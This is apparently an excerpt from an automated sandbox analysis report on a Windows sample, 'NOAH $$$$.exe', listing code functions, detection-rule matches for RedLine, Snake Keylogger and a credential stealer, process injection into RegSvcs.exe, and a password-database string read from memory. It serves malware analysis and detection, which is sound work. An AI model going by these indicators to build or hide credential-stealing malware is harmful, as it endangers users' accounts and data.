              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0255F4CB2_2_0255F4CB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0255D8812_2_0255D881
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0255F9272_2_0255F927
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0255E9D82_2_0255E9D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0255E9E82_2_0255E9E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_053641502_2_05364150
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_053691982_2_05369198
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_053686702_2_05368670
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0536ED382_2_0536ED38
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0536ED282_2_0536ED28
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_053641402_2_05364140
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0536C1B82_2_0536C1B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0536F1902_2_0536F190
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0536F1812_2_0536F181
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_053691882_2_05369188
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0536F5E82_2_0536F5E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0536F5D82_2_0536F5D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0536C1C82_2_0536C1C8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0536E0302_2_0536E030
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0536E0202_2_0536E020
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0536BC212_2_0536BC21
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_053600062_2_05360006
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0536E4782_2_0536E478
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_053600402_2_05360040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05367CB82_2_05367CB8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05360C902_2_05360C90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05360C832_2_05360C83
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0536E4882_2_0536E488
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0536E8E02_2_0536E8E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0536E8D02_2_0536E8D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05367CC82_2_05367CC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0536D3282_2_0536D328
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0536D3192_2_0536D319
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0536D7702_2_0536D770
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_053613782_2_05361378
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0536D7802_2_0536D780
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_053613882_2_05361388
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0536DBD82_2_0536DBD8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0536DBC82_2_0536DBC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0536FA302_2_0536FA30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0536C6202_2_0536C620
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0536C6102_2_0536C610
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0536CA782_2_0536CA78
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05361A782_2_05361A78
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0536CA682_2_0536CA68
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0536FA402_2_0536FA40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05361A882_2_05361A88
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0536CED02_2_0536CED0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0536CEC72_2_0536CEC7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0040E1D8 appears 44 times
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: String function: 004115D7 appears 36 times
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: String function: 00416C70 appears 39 times
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: String function: 00445AE0 appears 55 times
              Source: NOAH $$$$.exe, 00000000.00000003.2022481105.00000000044CD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs NOAH $$$$.exe
              Source: NOAH $$$$.exe, 00000000.00000003.2022366828.0000000004323000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs NOAH $$$$.exe
              Source: NOAH $$$$.exe, 00000000.00000002.2031225515.0000000002F40000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs NOAH $$$$.exe
              Source: NOAH $$$$.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 0.2.NOAH $$$$.exe.2f40000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 2.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 2.2.RegSvcs.exe.230a8be.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.230a8be.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.230a8be.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.2.RegSvcs.exe.23099d6.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.23099d6.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.23099d6.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.2.RegSvcs.exe.23099d6.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.23099d6.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.23099d6.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.2.RegSvcs.exe.2480ee8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.2480ee8.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.2480ee8.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.2.RegSvcs.exe.2480ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.2480ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.2480ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.2.RegSvcs.exe.4ac0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.4ac0000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.4ac0000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.2.RegSvcs.exe.2480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.2480000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.2480000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.2.RegSvcs.exe.2480000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.2480000.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.2480000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.2.RegSvcs.exe.4ac0000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.4ac0000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.4ac0000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.2.RegSvcs.exe.230a8be.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.230a8be.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.230a8be.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000000.00000002.2031225515.0000000002F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000002.00000002.4475149888.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000002.00000002.4474835763.00000000022C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000002.00000002.4473920648.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000002.00000002.4477864222.0000000004AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: Process Memory Space: RegSvcs.exe PID: 3688, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.4ac0000.5.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 2.2.RegSvcs.exe.4ac0000.5.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 2.2.RegSvcs.exe.4ac0000.5.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
              Source: 2.2.RegSvcs.exe.4ac0000.5.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
              Source: 2.2.RegSvcs.exe.4ac0000.5.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
              Source: 2.2.RegSvcs.exe.2480ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 2.2.RegSvcs.exe.2480ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 2.2.RegSvcs.exe.230a8be.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 2.2.RegSvcs.exe.230a8be.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@4/4
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
              Source: C:\Users\user\Desktop\NOAH $$$$.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
              Source: C:\Users\user\Desktop\NOAH $$$$.exeFile created: C:\Users\user\AppData\Local\Temp\chordatesJump to behavior
              Source: NOAH $$$$.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\NOAH $$$$.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\NOAH $$$$.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: RegSvcs.exe, 00000002.00000002.4475403957.00000000029AB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475403957.000000000299F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475403957.000000000295C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475403957.000000000297A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4475403957.000000000296C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: NOAH $$$$.exeReversingLabs: Detection: 47%
              Source: C:\Users\user\Desktop\NOAH $$$$.exeFile read: C:\Users\user\Desktop\NOAH $$$$.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\NOAH $$$$.exe "C:\Users\user\Desktop\NOAH $$$$.exe"
              Source: C:\Users\user\Desktop\NOAH $$$$.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\NOAH $$$$.exe"
              Source: C:\Users\user\Desktop\NOAH $$$$.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\NOAH $$$$.exe"Jump to behavior
              Source: C:\Users\user\Desktop\NOAH $$$$.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\NOAH $$$$.exeSection loaded: wsock32.dllJump to behavior
